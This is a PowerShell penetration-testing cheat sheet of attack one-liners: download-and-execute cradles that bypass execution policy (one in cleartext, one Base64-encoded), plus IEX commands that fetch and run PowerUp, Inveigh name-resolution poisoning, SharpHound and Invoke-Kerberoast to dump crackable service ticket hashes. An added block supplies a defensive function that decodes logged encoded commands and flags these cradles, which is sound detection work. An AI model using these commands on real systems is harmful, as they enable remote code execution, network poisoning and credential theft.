One-liners / commands for PowerShell.

Base64

Simple string encode

[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("ENCODE THIS :  `"STR`" !"))

Simple string decode

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RU5DT0RFIFRISVMgOiAgIlNUUiIgIQ=="))

Download/Exec

HTTP cleartext dl/exec

powershell -Sta -Nop -exec bypass -c "(New-Object Net.WebClient).DownloadString('http://IP:PORT/a.html')"

HTTP encoded dl/exec

powershell -Sta -Nop -exec bypass -e KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA1AC8AYQAuAGgAdABtAGwAJwApAA==
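
When a command line like the encoded one above shows up in process or script-block logs, the argument can be decoded and checked for the same cradle markers seen in the cleartext commands on this page. This is an added example, not part of the original cheat sheet; the function name `Test-EncodedCommand`, the marker list and the sample log line are assumptions. Note that `-e` carries Base64 of UTF-16LE text, not the UTF-8 used in the Base64 section.

```powershell
# Added example, not from the original page: decode the -e / -EncodedCommand
# argument of a logged powershell.exe command line and report cradle markers.
function Test-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Marker list is an assumption, taken from the commands on this page.
    $markers = 'Net\.WebClient', 'DownloadString', '\bIEX\b', 'Invoke-Expression'
    $report = [ordered]@{
        ExecBypass = $CommandLine -match '\s-(ep|ex\w*)\s+bypass'
        NoProfile  = $CommandLine -match '\s-nop\w*'
        Decoded    = $null
        Hits       = @()
        Error      = $null
    }

    # -e, -ec, -enc ... -EncodedCommand all select the same parameter.
    if ($CommandLine -match '\s-(?:e|ec|en\w*)\s+([A-Za-z0-9+/=]+)') {
        # Re-pad, so a blob logged with missing or extra '=' still decodes.
        $b64 = $Matches[1].TrimEnd('=')
        $b64 += '=' * ((4 - $b64.Length % 4) % 4)
        try {
            # -EncodedCommand carries UTF-16LE text, not UTF-8.
            $bytes = [System.Convert]::FromBase64String($b64)
            $report.Decoded = [System.Text.Encoding]::Unicode.GetString($bytes)
            $report.Hits = @($markers | Where-Object { $report.Decoded -match $_ })
        } catch {
            # Not valid Base64 even after re-padding: keep the reason for triage.
            $report.Error = $_.Exception.Message
        }
    }
    [pscustomobject]$report
}

# Constructed sample log line (192.0.2.10 is a documentation address).
$text   = "(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.html')"
$blob   = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($text))
$logged = "powershell -Sta -Nop -exec bypass -e ${blob}="   # stray '=' as it might be logged
Test-EncodedCommand -CommandLine $logged | Format-List
```

The same markers can be matched directly against script-block logging output, where the decoded text is already recorded.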

Exec useful modules

PowerUp.ps1 / Invoke-Allchecks

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks"

Inveigh.ps1 / Responder

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

Bloodhound

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

Invoke-Kerberoast

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat hashcat  | fl"